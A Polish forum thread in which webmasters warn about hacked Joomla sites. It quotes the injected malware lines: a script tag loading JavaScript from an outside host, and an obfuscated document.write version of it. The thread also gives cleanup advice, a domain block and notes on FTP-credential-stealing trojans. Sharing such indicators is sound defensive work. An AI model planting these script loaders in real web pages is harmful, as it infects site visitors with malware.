PDA

Zobacz pełną wersję : Ostrzeżenie atak na dwie witryny



Eddie69
10-07-2010, 15:55
Witam,

Ostatnio na dwie moje witryny postawione na Joomla 1.5.x na dwóch różnych serwerach, ktoś przypuścił atak. Objawia się to blokowaniem dostępu przez antyvira, bo znajduje albo trojana albo robaka.
Problem leży w tym że w katalogu admina we wszystkich plikach index.php i index.html na końcu dopisany jest kod:

<script type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/xxx.js"></script>
<!--2577a01bf2a998bacdd5dc9a781b2f35-->

natomiast w plikach *.js dopisane jest:

document.write('<s'+'cript type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/xxx.js"></scr'+'ipt>');

Zabezpieczajcie zaplecze, bo później roboty jest co nie miara aby to badziewie wywalić.

Pozdrawiam

mjmartino
10-07-2010, 21:26
dodana domena do htaccess :) Podziękował :)

Eddie69
10-07-2010, 22:50
No problem :) cieszę się, że komuś to pomoże bo roboty jest sporo aby doprowadzić stronę do porządku.

mjmartino
10-07-2010, 22:55
No problem :) cieszę się, że komuś to pomoże bo roboty jest sporo aby doprowadzić stronę do porządku.
Generalnie to polecam Ci przeskanować kompa czy nie złapałeś czasem jakiegoś trojana który przechwytuje log i passw podczas logowania na ftpy
Zmiana hasła do ftpa też by była na miejscu ;)
A to z tego względu pisze o tym że kiedyś kolega miał problem i do każdej końcówki html dodany był odnośnik iframe i wówczas okazał się winny trojan który owe dane zbierał i wysyłał w świat...

Eddie69
11-07-2010, 12:48
Dzięki za podpowiedź a przeskanować muszę 3 kompy w pracy bo w domu teraz pracuję na Ubuntu. A hasła oczywiście zmieniłem po wykryciu ataku. Zobaczymy co się będzie działo dalej, zostawiłem jeszcze jedną witrynę postawioną na Joomla 1.0.x na pożarcie ;) bo do tej pory były bezpieczne.

alex51
11-07-2010, 13:04
(...)Zobaczymy co się będzie działo dalej, zostawiłem jeszcze jedną witrynę postawioną na Joomla 1.0.x na pożarcie ;) bo do tej pory były bezpieczne.
Wbrew pozorom J! 1.0.15 była najlepiej dopracowaną wersją w starym systemie, a apetyt atakujących zwykle jest kierowany na nowsze, stale aktualizowane wersje. Nie oszukujmy się, że wersja J! 1.5.18 okaże się ostatnią, najbardziej dopracowaną wersją nowego systemu.